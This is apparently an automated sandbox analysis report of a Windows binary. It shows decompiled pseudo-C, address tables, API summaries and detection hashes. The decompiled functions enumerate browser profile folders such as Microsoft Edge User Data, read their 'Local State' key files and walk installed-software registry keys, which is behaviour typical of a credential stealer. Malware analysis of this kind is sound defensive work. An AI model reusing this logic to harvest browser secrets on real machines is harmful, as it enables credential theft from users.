				_t7 =  *0x432680; // 0x2337ff8
				E00424E20(__ebx, __edi, __esi, _t170, _t7, _t103, _t71); // executed
				_t72 =  *0x4325e8; // 0x2337f38
				_t104 =  *0x432610; // 0x2337710
				_t9 =  *0x432620; // 0x2337e00
				E00424E20(_t69, _t134, _t135, _t170, _t9, _t104, _t72); // executed
				_t73 =  *0x4325e8; // 0x2337f38
				_t105 =  *0x432290; // 0x23364d0
				_t11 =  *0x432344; // 0x2337e78
				E00424E20(_t69, _t134, _t135, _t170, _t11, _t105, _t73); // executed
				_t74 =  *0x4325e8; // 0x2337f38
				_t106 =  *0x432328; // 0x2336318
				_t13 =  *0x432194; // 0x2338040
				E00424E20(_t69, _t134, _t135, _t170, _t13, _t106, _t74); // executed
				_t75 =  *0x43263c; // 0x23375d0
				_t107 =  *0x432144; // 0x2337da0
				_t15 =  *0x432144; // 0x2337da0
				E00424E20(_t69, _t134, _t135, _t170, _t15, _t107, _t75); // executed
				_t76 =  *0x432384; // 0x2337650
				_t108 =  *0x432144; // 0x2337da0
				_t17 =  *0x432144; // 0x2337da0
				E00424E20(_t69, _t134, _t135, _t170, _t17, _t108, _t76); // executed
				_t77 =  *0x432464; // 0x2337ef0
				_t109 =  *0x432478; // 0x2336480
				_t19 =  *0x432144; // 0x2337da0
				E00424E20(_t69, _t134, _t135, _t170, _t19, _t109, _t77); // executed
				_t78 =  *0x4325f8; // 0x2337d88
				_t110 =  *0x432478; // 0x2336480
				_t21 =  *0x432144; // 0x2337da0
				E00424E20(_t69, _t134, _t135, _t170, _t21, _t110, _t78); // executed
				_t79 =  *0x432614; // 0x2337e48
				_t111 =  *0x432478; // 0x2336480
				_t23 =  *0x432144; // 0x2337da0
				E00424E20(_t69, _t134, _t135, _t170, _t23, _t111, _t79); // executed
				_t80 =  *0x4324e8; // 0x2337810
				_t112 =  *0x432430; // 0x2337e60
				_t25 =  *0x432430; // 0x2337e60
				E00424E20(_t69, _t134, _t135, _t170, _t25, _t112, _t80); // executed
				_t81 =  *0x432190; // 0x2337f68
				_t113 =  *0x4326a4; // 0x2337f50
				_t27 =  *0x4326a4; // 0x2337f50
				E00424E20(_t69, _t134, _t135, _t170, _t27, _t113, _t81); // executed
				_t82 =  *0x432190; // 0x2337f68
				_t114 =  *0x432630; // 0x2337fc8
				_t29 =  *0x432630; // 0x2337fc8
				E00424E20(_t69, _t134, _t135, _t170, _t29, _t114, _t82); // executed
				_t83 =  *0x432190; // 0x2337f68
				_t115 =  *0x4323e0; // 0x2338070
				_t31 =  *0x4323e0; // 0x2338070
				E00424E20(_t69, _t134, _t135, _t170, _t31, _t115, _t83); // executed
				_t84 =  *0x432190; // 0x2337f68
				_t116 =  *0x43269c; // 0x2337ea8
				_t33 =  *0x43269c; // 0x2337ea8
				E00424E20(_t69, _t134, _t135, _t170, _t33, _t116, _t84); // executed
				_t85 =  *0x432190; // 0x2337f68
				_t117 =  *0x432510; // 0x2337f98
				_t35 =  *0x432510; // 0x2337f98
				E00424E20(_t69, _t134, _t135, _t170, _t35, _t117, _t85); // executed
				_t86 =  *0x432190; // 0x2337f68
				_t118 =  *0x432484; // 0x2337dd0
				_t37 =  *0x432484; // 0x2337dd0
				E00424E20(_t69, _t134, _t135, _t170, _t37, _t118, _t86); // executed
				_t87 =  *0x432190; // 0x2337f68
				_t119 =  *0x432698; // 0x2337e90
				_t39 =  *0x432698; // 0x2337e90
				E00424E20(_t69, _t134, _t135, _t170, _t39, _t119, _t87); // executed
				_t88 =  *0x432190; // 0x2337f68
				_t120 =  *0x432518; // 0x2337f20
				_t41 =  *0x432518; // 0x2337f20
				E00424E20(_t69, _t134, _t135, _t170, _t41, _t120, _t88); // executed
				_t89 =  *0x432190; // 0x2337f68
				_t121 =  *0x43234c; // 0x2337fe0
				_t43 =  *0x43234c; // 0x2337fe0
				E00424E20(_t69, _t134, _t135, _t170, _t43, _t121, _t89); // executed
				_t90 =  *0x432190; // 0x2337f68
				_t122 =  *0x432238; // 0x2337ed8
				_t45 =  *0x432238; // 0x2337ed8
				E00424E20(_t69, _t134, _t135, _t170, _t45, _t122, _t90); // executed
				_t91 =  *0x432190; // 0x2337f68
				_t123 =  *0x43216c; // 0x2337790
				_t47 =  *0x432414; // 0x2337de8
				E00424E20(_t69, _t134, _t135, _t170, _t47, _t123, _t91); // executed
				_t92 =  *0x432190; // 0x2337f68
				_t124 =  *0x43268c; // 0x23378d0
				_t49 =  *0x43268c; // 0x23378d0
				E00424E20(_t69, _t134, _t135, _t170, _t49, _t124, _t92); // executed
				_t93 =  *0x432190; // 0x2337f68
				_t125 =  *0x432654; // 0x2337ec0
				_t51 =  *0x432654; // 0x2337ec0
				E00424E20(_t69, _t134, _t135, _t170, _t51, _t125, _t93); // executed
				_t94 =  *0x432190; // 0x2337f68
				_t126 =  *0x4320c0; // 0x2338010
				_t53 =  *0x4320c0; // 0x2338010
				E00424E20(_t69, _t134, _t135, _t170, _t53, _t126, _t94); // executed
				_t95 =  *0x432190; // 0x2337f68
				_t127 =  *0x4321ac; // 0x2337e18
				_t55 =  *0x4321ac; // 0x2337e18
				E00424E20(_t69, _t134, _t135, _t170, _t55, _t127, _t95); // executed
				_t96 =  *0x432190; // 0x2337f68
				_t128 =  *0x432530; // 0x2338028
				_t57 =  *0x432530; // 0x2338028
				E00424E20(_t69, _t134, _t135, _t170, _t57, _t128, _t96); // executed
				_t97 =  *0x432190; // 0x2337f68
				_t129 =  *0x432380; // 0x2338058
				_t59 =  *0x432380; // 0x2338058
				E00424E20(_t69, _t134, _t135, _t170, _t59, _t129, _t97); // executed
				_t98 =  *0x432190; // 0x2337f68
				_t130 =  *0x43209c; // 0x2337f08
				_t61 =  *0x43209c; // 0x2337f08
				E00424E20(_t69, _t134, _t135, _t170, _t61, _t130, _t98); // executed
				_t99 =  *0x432190; // 0x2337f68
				_t131 =  *0x4320cc; // 0x23380b8
				_t63 =  *0x4320cc; // 0x23380b8
				E00424E20(_t69, _t134, _t135, _t170, _t63, _t131, _t99); // executed
				_t100 =  *0x432190; // 0x2337f68
				_t132 =  *0x432180; // 0x2338100
				_t65 =  *0x432180; // 0x2338100
				E00424E20(_t69, _t134, _t135, _t170, _t65, _t132, _t100); // executed
				_t101 =  *0x4321dc; // 0x2337108
				_t133 =  *0x432130; // 0x23382d8
				_t67 =  *0x432300; // 0x2338148
				_t68 = E00424E20(_t69, _t134, _t135, _t170, _t67, _t133, _t101); // executed
				return _t68;
			}





































































































                                                                                                                              0x00424f00
                                                                                                                              0x00424f00
                                                                                                                              0x00424f00
                                                                                                                              0x00424f0f
                                                                                                                              0x00424f20
                                                                                                                              0x00424f26
                                                                                                                              0x00424f2d
                                                                                                                              0x00424f34
                                                                                                                              0x00424f3a
                                                                                                                              0x00424f42
                                                                                                                              0x00424f49
                                                                                                                              0x00424f50
                                                                                                                              0x00424f56
                                                                                                                              0x00424f5e
                                                                                                                              0x00424f65
                                                                                                                              0x00424f6c
                                                                                                                              0x00424f72
                                                                                                                              0x00424f7a
                                                                                                                              0x00424f81
                                                                                                                              0x00424f88
                                                                                                                              0x00424f8e
                                                                                                                              0x00424f96
                                                                                                                              0x00424f9d
                                                                                                                              0x00424fa4
                                                                                                                              0x00424faa
                                                                                                                              0x00424fb2
                                                                                                                              0x00424fb9
                                                                                                                              0x00424fc0
                                                                                                                              0x00424fc6
                                                                                                                              0x00424fce
                                                                                                                              0x00424fd5
                                                                                                                              0x00424fdc
                                                                                                                              0x00424fe2
                                                                                                                              0x00424fea
                                                                                                                              0x00424ff1
                                                                                                                              0x00424ff8
                                                                                                                              0x00424ffe
                                                                                                                              0x00425006
                                                                                                                              0x0042500d
                                                                                                                              0x00425014
                                                                                                                              0x0042501a
                                                                                                                              0x00425022
                                                                                                                              0x00425029
                                                                                                                              0x00425030
                                                                                                                              0x00425036
                                                                                                                              0x0042503e
                                                                                                                              0x00425045
                                                                                                                              0x0042504c
                                                                                                                              0x00425052
                                                                                                                              0x0042505a
                                                                                                                              0x00425061
                                                                                                                              0x00425068
                                                                                                                              0x0042506e
                                                                                                                              0x00425076
                                                                                                                              0x0042507d
                                                                                                                              0x00425084
                                                                                                                              0x0042508a
                                                                                                                              0x00425092
                                                                                                                              0x00425099
                                                                                                                              0x004250a0
                                                                                                                              0x004250a6
                                                                                                                              0x004250ae
                                                                                                                              0x004250b5
                                                                                                                              0x004250bc
                                                                                                                              0x004250c2
                                                                                                                              0x004250ca
                                                                                                                              0x004250d1
                                                                                                                              0x004250d8
                                                                                                                              0x004250de
                                                                                                                              0x004250e6
                                                                                                                              0x004250ed
                                                                                                                              0x004250f4
                                                                                                                              0x004250fa
                                                                                                                              0x00425102
                                                                                                                              0x00425109
                                                                                                                              0x00425110
                                                                                                                              0x00425116
                                                                                                                              0x0042511e
                                                                                                                              0x00425125
                                                                                                                              0x0042512c
                                                                                                                              0x00425132
                                                                                                                              0x0042513a
                                                                                                                              0x00425141
                                                                                                                              0x00425148
                                                                                                                              0x0042514e
                                                                                                                              0x00425156
                                                                                                                              0x0042515d
                                                                                                                              0x00425164
                                                                                                                              0x0042516a
                                                                                                                              0x00425172
                                                                                                                              0x00425179
                                                                                                                              0x00425180
                                                                                                                              0x00425186
                                                                                                                              0x0042518e
                                                                                                                              0x00425195
                                                                                                                              0x0042519c
                                                                                                                              0x004251a2
                                                                                                                              0x004251aa
                                                                                                                              0x004251b1
                                                                                                                              0x004251b8
                                                                                                                              0x004251be
                                                                                                                              0x004251c6
                                                                                                                              0x004251cd
                                                                                                                              0x004251d4
                                                                                                                              0x004251da
                                                                                                                              0x004251e2
                                                                                                                              0x004251e9
                                                                                                                              0x004251f0
                                                                                                                              0x004251f6
                                                                                                                              0x004251fe
                                                                                                                              0x00425205
                                                                                                                              0x0042520c
                                                                                                                              0x00425212
                                                                                                                              0x0042521a
                                                                                                                              0x00425221
                                                                                                                              0x00425228
                                                                                                                              0x0042522e
                                                                                                                              0x00425236
                                                                                                                              0x0042523d
                                                                                                                              0x00425244
                                                                                                                              0x0042524a
                                                                                                                              0x00425252
                                                                                                                              0x00425259
                                                                                                                              0x00425260
                                                                                                                              0x00425266
                                                                                                                              0x0042526e
                                                                                                                              0x00425275
                                                                                                                              0x0042527c
                                                                                                                              0x00425282
                                                                                                                              0x0042528a
                                                                                                                              0x00425291
                                                                                                                              0x00425298
                                                                                                                              0x0042529e
                                                                                                                              0x004252a7

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 00424F0F
                                                                                                                              • lstrcat.KERNEL32(C:\\ProgramData\\300337377349991,004210BE), ref: 00424F20
                                                                                                                                • Part of subcall function 00424E20: _memset.LIBCMT ref: 00424E41
                                                                                                                                • Part of subcall function 00424E20: lstrcat.KERNEL32(?,02337DB8), ref: 00424E65
                                                                                                                                • Part of subcall function 00424E20: _memset.LIBCMT ref: 00424E79
                                                                                                                                • Part of subcall function 00424E20: lstrcat.KERNEL32(?,C:\\ProgramData\\300337377349991), ref: 00424E8D
                                                                                                                                • Part of subcall function 00424E20: lstrcat.KERNEL32(?,02337E30), ref: 00424EA0
                                                                                                                                • Part of subcall function 00424E20: lstrcat.KERNEL32(?,02337DB8), ref: 00424EB1
                                                                                                                                • Part of subcall function 00424E20: CreateDirectoryA.KERNEL32(?,00000000), ref: 00424EC0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcat$_memset$CreateDirectory
                                                                                                                              • String ID: C:\\ProgramData\\300337377349991
                                                                                                                              • API String ID: 2116157328-1113949659
                                                                                                                              • Opcode ID: 68618ae334612c316fc4654c644ec3a2389e9793a72b7eed8bfea142103e70cb
                                                                                                                              • Instruction ID: 6916c144791a522f3d991c651c15dc8eb940c2e24fba88255345f40e4dd8dd62
                                                                                                                              • Opcode Fuzzy Hash: 68618ae334612c316fc4654c644ec3a2389e9793a72b7eed8bfea142103e70cb
                                                                                                                              • Instruction Fuzzy Hash: D1A1BFB2A10510BBDB08DB99FF95C1633AAB7DC304714613CF708C7275EAB4A9158BAD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041EBD0, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 213COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E0041EBD0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				char _v275;
				char _v276;
				intOrPtr _v280;
				void* __ebp;
				signed int _t8;
				intOrPtr _t12;
				intOrPtr _t64;
				signed int _t114;
				void* _t115;
				void* _t117;

				_t113 = __esi;
				_t112 = __edi;
				_t68 = __ebx;
				_t8 =  *0x4301f4; // 0xe687535
				_v8 = _t8 ^ _t114;
				_v276 = 0;
				E004091C0( &_v275, 0, 0x103);
				_t92 =  *0x4325d0;
				_t12 = E004055AB( *0x4325d0,  *0x4321d0); // executed
				_t117 = _t115 + 0x14;
				_v280 = _t12;
				_t148 = _v280;
				if(_v280 != 0) {
					_push(_v280);
					E00405EA3(__ebx, _t92, __edi, __esi, _t148);
					_t117 = _t117 + 4; // executed
				}
				E0041BEE0(_t68); // executed
				E0041C810(); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x4324f4,  *0x4323f8); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x4325e4,  *0x432200); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x43253c,  *0x432288); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x43246c,  *0x4324b8); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x432670,  *0x4323fc); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x43230c,  *0x43254c); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x432684,  *0x432640); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x432324,  *0x432268); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x432350,  *0x4323c4); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x4321bc,  *0x4320b4); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x4324dc,  *0x432598); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x432320,  *0x432410); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x43231c,  *0x4320fc); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x43223c,  *0x43240c); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x43235c,  *0x4324d8); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x4325b8,  *0x432638); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x432358,  *0x432148); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x43260c,  *0x432660); // executed
				E0041EAB0(_t68, _t112, _t113, _t148, "\\Microsoft\\Edge\\User Data\\", "Microsoft Edge"); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x432128,  *0x432168); // executed
				E0041EAB0(_t68, _t112, _t113, _t148,  *0x4326e0,  *0x4323d0); // executed
				E0041E990(_t68, _t112, _t113, _t148,  *0x432368,  *0x432370); // executed
				E0041D650(_t68, _t112, _t113, _t148,  *0x432260,  *0x432334); // executed
				E0041D650(_t68, _t112, _t113, _t148,  *0x43251c,  *0x4320b0); // executed
				E0041D650(_t68, _t112, _t113, _t148,  *0x432444,  *0x4323b4); // executed
				E0041D650(_t68, _t112, _t113, _t148,  *0x432284,  *0x4322a8); // executed
				E0041D650(_t68, _t112, _t113, _t148,  *0x4321c0,  *0x432514); // executed
				E0041D650(_t68, _t112, _t113, _t148,  *0x432434,  *0x4320f0); // executed
				E0041D650(_t68, _t112, _t113, _t148,  *0x432228,  *0x432208); // executed
				E0041D650(_t68, _t112, _t113, _t148,  *0x4323b0,  *0x432248); // executed
				_t64 = E0041C670(); // executed
				return E00404354(_t64, _t68, _v8 ^ _t114,  *0x432228, _t112, _t113);
			}














                                                                                                                              0x0041ebd0
                                                                                                                              0x0041ebd0
                                                                                                                              0x0041ebd0
                                                                                                                              0x0041ebd9
                                                                                                                              0x0041ebe0
                                                                                                                              0x0041ebe3
                                                                                                                              0x0041ebf8
                                                                                                                              0x0041ec07
                                                                                                                              0x0041ec0e
                                                                                                                              0x0041ec13
                                                                                                                              0x0041ec16
                                                                                                                              0x0041ec1c
                                                                                                                              0x0041ec23
                                                                                                                              0x0041ec2b
                                                                                                                              0x0041ec2c
                                                                                                                              0x0041ec31
                                                                                                                              0x0041ec31
                                                                                                                              0x0041ec34
                                                                                                                              0x0041ec39
                                                                                                                              0x0041ec4c
                                                                                                                              0x0041ec61
                                                                                                                              0x0041ec76
                                                                                                                              0x0041ec8c
                                                                                                                              0x0041eca1
                                                                                                                              0x0041ecb6
                                                                                                                              0x0041eccc
                                                                                                                              0x0041ece1
                                                                                                                              0x0041ecf6
                                                                                                                              0x0041ed0c
                                                                                                                              0x0041ed21
                                                                                                                              0x0041ed36
                                                                                                                              0x0041ed4c
                                                                                                                              0x0041ed61
                                                                                                                              0x0041ed76
                                                                                                                              0x0041ed8c
                                                                                                                              0x0041eda1
                                                                                                                              0x0041edb6
                                                                                                                              0x0041edc8
                                                                                                                              0x0041edde
                                                                                                                              0x0041edf3
                                                                                                                              0x0041ee08
                                                                                                                              0x0041ee1e
                                                                                                                              0x0041ee33
                                                                                                                              0x0041ee48
                                                                                                                              0x0041ee5e
                                                                                                                              0x0041ee73
                                                                                                                              0x0041ee88
                                                                                                                              0x0041ee9e
                                                                                                                              0x0041eeb3
                                                                                                                              0x0041eebb
                                                                                                                              0x0041eecd

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041EBF8
                                                                                                                                • Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8
                                                                                                                                • Part of subcall function 0041EAB0: _memset.LIBCMT ref: 0041EADF
                                                                                                                                • Part of subcall function 0041EAB0: _memset.LIBCMT ref: 0041EB17
                                                                                                                                • Part of subcall function 0041E990: _memset.LIBCMT ref: 0041E9BF
                                                                                                                                • Part of subcall function 0041E990: _memset.LIBCMT ref: 0041E9F7
                                                                                                                                • Part of subcall function 0041D650: _memset.LIBCMT ref: 0041D671
                                                                                                                                • Part of subcall function 0041D650: _memset.LIBCMT ref: 0041D687
                                                                                                                                • Part of subcall function 0041C670: FreeLibrary.KERNEL32(?), ref: 0041C679
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$FreeLibrary__fsopen
                                                                                                                              • String ID: Microsoft Edge$\Microsoft\Edge\User Data\
                                                                                                                              • API String ID: 3581409050-1389121604
                                                                                                                              • Opcode ID: 38802b40fbcb17c391508f29b6d8f21a50793d1d3cb106a7df531d61abcaaade
                                                                                                                              • Instruction ID: 2d2fb931b9ae42665d291fc59a7f3fa147f8e89296656bc41511a520b111f3b3
                                                                                                                              • Opcode Fuzzy Hash: 38802b40fbcb17c391508f29b6d8f21a50793d1d3cb106a7df531d61abcaaade
                                                                                                                              • Instruction Fuzzy Hash: F97168F6910100ABC304EBA5FE92DAB3379BB5C309B04553DFA0993262E679E544CB7D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041E990, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 64%
                                                                                                                              			E0041E990(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				signed int _v16;
				char _v284;
				char _v548;
				signed int _t25;
				void* _t36;
				void* _t43;
				intOrPtr _t62;
				intOrPtr _t63;
				signed int _t64;
				void* _t65;
				void* _t69;

				_t63 = __esi;
				_t62 = __edi;
				_t46 = __ebx;
				_t25 =  *0x4301f4; // 0xe687535
				_v16 = _t25 ^ _t64;
				_v12 = 0;
				_v8 = 0;
				E004091C0( &_v284, 0, 0x104);
				E0041A380( &_v284, 0x1a); // executed
				 *0x4328c4( &_v284, _a4);
				E004091C0( &_v548, 0, 0x104);
				 *0x4328c4( &_v548,  &_v284);
				 *0x4328c4( &_v548, "\\Local State");
				_t36 = E0041A6E0( &_v548); // executed
				_t69 = _t65 + 0x24;
				if(_t36 != 0) {
					_t43 = E0041D900(__ebx,  &_v548,  &_v12,  &_v8);
					_t69 = _t69 + 0xc;
					if(_t43 == 0) {
						E0041CAC0( &_v12,  &_v8);
						_t69 = _t69 + 8;
					}
				}
				E0041E640(_t46, _t62, _t63, 0x429447,  &_v284, _a8, _v12, _v8); // executed
				return E00404354(E0041CAC0( &_v12,  &_v8), _t46, _v16 ^ _t64,  &_v284, _t62, _t63);
			}
















                                                                                                                              0x0041e990
                                                                                                                              0x0041e990
                                                                                                                              0x0041e990
                                                                                                                              0x0041e999
                                                                                                                              0x0041e9a0
                                                                                                                              0x0041e9a3
                                                                                                                              0x0041e9aa
                                                                                                                              0x0041e9bf
                                                                                                                              0x0041e9d0
                                                                                                                              0x0041e9e3
                                                                                                                              0x0041e9f7
                                                                                                                              0x0041ea0d
                                                                                                                              0x0041ea1f
                                                                                                                              0x0041ea2c
                                                                                                                              0x0041ea31
                                                                                                                              0x0041ea36
                                                                                                                              0x0041ea47
                                                                                                                              0x0041ea4c
                                                                                                                              0x0041ea51
                                                                                                                              0x0041ea5b
                                                                                                                              0x0041ea60
                                                                                                                              0x0041ea60
                                                                                                                              0x0041ea51
                                                                                                                              0x0041ea7b
                                                                                                                              0x0041eaa0

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041E9BF
                                                                                                                              • _memset.LIBCMT ref: 0041E9F7
                                                                                                                                • Part of subcall function 0041A6E0: GetFileAttributesA.KERNEL32(?), ref: 0041A6EA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$AttributesFile
                                                                                                                              • String ID: \Local State
                                                                                                                              • API String ID: 1178313770-679424310
                                                                                                                              • Opcode ID: 2f3b5c659c8d8e5d695adeaf8c097039d676b0f913797c5650b6d42f32c8d7ed
                                                                                                                              • Instruction ID: aabe7e0d757943bf1a559953441f035433ab2aea8e542140c35c9f68380cff5b
                                                                                                                              • Opcode Fuzzy Hash: 2f3b5c659c8d8e5d695adeaf8c097039d676b0f913797c5650b6d42f32c8d7ed
                                                                                                                              • Instruction Fuzzy Hash: 303178F6D0010CBBCB14EBD1EC86FDE7378AF58304F444199B605A6182EA749788CBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041EAB0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 64%
                                                                                                                              			E0041EAB0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				signed int _v16;
				char _v284;
				char _v548;
				signed int _t25;
				void* _t36;
				void* _t43;
				intOrPtr _t62;
				intOrPtr _t63;
				signed int _t64;
				void* _t65;
				void* _t69;

				_t63 = __esi;
				_t62 = __edi;
				_t46 = __ebx;
				_t25 =  *0x4301f4; // 0xe687535
				_v16 = _t25 ^ _t64;
				_v12 = 0;
				_v8 = 0;
				E004091C0( &_v284, 0, 0x104);
				E0041A380( &_v284, 0x1c); // executed
				 *0x4328c4( &_v284, _a4);
				E004091C0( &_v548, 0, 0x104);
				 *0x4328c4( &_v548,  &_v284);
				 *0x4328c4( &_v548, "\\Local State");
				_t36 = E0041A6E0( &_v548); // executed
				_t69 = _t65 + 0x24;
				if(_t36 != 0) {
					_t43 = E0041D900(__ebx,  &_v548,  &_v12,  &_v8); // executed
					_t69 = _t69 + 0xc;
					if(_t43 == 0) {
						E0041CAC0( &_v12,  &_v8);
						_t69 = _t69 + 8;
					}
				}
				E0041E640(_t46, _t62, _t63, 0x429446,  &_v284, _a8, _v12, _v8); // executed
				return E00404354(E0041CAC0( &_v12,  &_v8), _t46, _v16 ^ _t64,  &_v284, _t62, _t63);
			}
















                                                                                                                              0x0041eab0
                                                                                                                              0x0041eab0
                                                                                                                              0x0041eab0
                                                                                                                              0x0041eab9
                                                                                                                              0x0041eac0
                                                                                                                              0x0041eac3
                                                                                                                              0x0041eaca
                                                                                                                              0x0041eadf
                                                                                                                              0x0041eaf0
                                                                                                                              0x0041eb03
                                                                                                                              0x0041eb17
                                                                                                                              0x0041eb2d
                                                                                                                              0x0041eb3f
                                                                                                                              0x0041eb4c
                                                                                                                              0x0041eb51
                                                                                                                              0x0041eb56
                                                                                                                              0x0041eb67
                                                                                                                              0x0041eb6c
                                                                                                                              0x0041eb71
                                                                                                                              0x0041eb7b
                                                                                                                              0x0041eb80
                                                                                                                              0x0041eb80
                                                                                                                              0x0041eb71
                                                                                                                              0x0041eb9b
                                                                                                                              0x0041ebc0

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041EADF
                                                                                                                              • _memset.LIBCMT ref: 0041EB17
                                                                                                                                • Part of subcall function 0041A6E0: GetFileAttributesA.KERNEL32(?), ref: 0041A6EA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$AttributesFile
                                                                                                                              • String ID: \Local State
                                                                                                                              • API String ID: 1178313770-679424310
                                                                                                                              • Opcode ID: c11a84685851c92bee2c3b0c255c9cf4a8c42ae4e8215d334a8c5c3288112bdf
                                                                                                                              • Instruction ID: b0ab83bab44515073897f62d2fa019738ac76b2c10f22035d5c686078b2382ec
                                                                                                                              • Opcode Fuzzy Hash: c11a84685851c92bee2c3b0c255c9cf4a8c42ae4e8215d334a8c5c3288112bdf
                                                                                                                              • Instruction Fuzzy Hash: 393178F6D4010CBBCB14EBD1EC86FDE7378AB58304F444199B60566182EA749788CBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041AD33, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 15%
                                                                                                                              			E0041AD33() {
				intOrPtr _t53;
				long _t56;
				long _t60;
				long _t62;
				long _t69;
				intOrPtr _t78;
				intOrPtr _t107;
				intOrPtr _t108;
				signed int _t109;

				L0:
				while(1) {
					L0:
					 *(_t109 - 0x31960) =  *(_t109 - 0x31960) + 1;
					if( *(_t109 - 0x814) != 0) {
						break;
					}
					L2:
					 *(_t109 - 0x818) = 0x400;
					_t56 = RegEnumKeyExA( *(_t109 - 0x810),  *(_t109 - 0x31960), _t109 - 0x408, _t109 - 0x818, 0, 0, 0, 0); // executed
					 *(_t109 - 0x814) = _t56;
					if( *(_t109 - 0x814) != 0) {
						L13:
						continue;
					} else {
						L3:
						 *0x432768(_t109 - 0x808, "%s\\%s",  *((intOrPtr*)(_t109 - 0x3195c)), _t109 - 0x408);
						_t60 = RegOpenKeyExA(0x80000002, _t109 - 0x808, 0, 0x20019, _t109 - 0x80c); // executed
						if(_t60 == 0) {
							L5:
							 *(_t109 - 0x818) = 0x400;
							_t62 = RegQueryValueExA( *(_t109 - 0x80c),  *0x432678, 0, _t109 - 4, _t109 - 0xc18, _t109 - 0x818); // executed
							if(_t62 == 0) {
								L6:
								 *((intOrPtr*)(_t109 - 0x31964)) = _t109 - 0xc18;
								 *((intOrPtr*)(_t109 - 0x31968)) =  *((intOrPtr*)(_t109 - 0x31964)) + 1;
								do {
									L7:
									 *((char*)(_t109 - 0x31969)) =  *((intOrPtr*)( *((intOrPtr*)(_t109 - 0x31964))));
									 *((intOrPtr*)(_t109 - 0x31964)) =  *((intOrPtr*)(_t109 - 0x31964)) + 1;
								} while ( *((char*)(_t109 - 0x31969)) != 0);
								 *((intOrPtr*)(_t109 - 0x31970)) =  *((intOrPtr*)(_t109 - 0x31964)) -  *((intOrPtr*)(_t109 - 0x31968));
								if( *((intOrPtr*)(_t109 - 0x31970)) > 1) {
									L9:
									 *0x4328c4(_t109 - 0x31958, _t109 - 0xc18);
									 *(_t109 - 0x818) = 0x400;
									_t69 = RegQueryValueExA( *(_t109 - 0x80c),  *0x432418, 0, _t109 - 4, _t109 - 0xc18, _t109 - 0x818); // executed
									if(_t69 == 0) {
										 *0x4328c4(_t109 - 0x31958, " ");
										 *0x4328c4(_t109 - 0x31958, _t109 - 0xc18);
									}
									L11:
									 *0x4328c4(_t109 - 0x31958, "\n");
								}
							}
							L12:
							 *0x432858( *(_t109 - 0x80c));
							goto L13;
						} else {
							L4:
							_t96 =  *(_t109 - 0x80c);
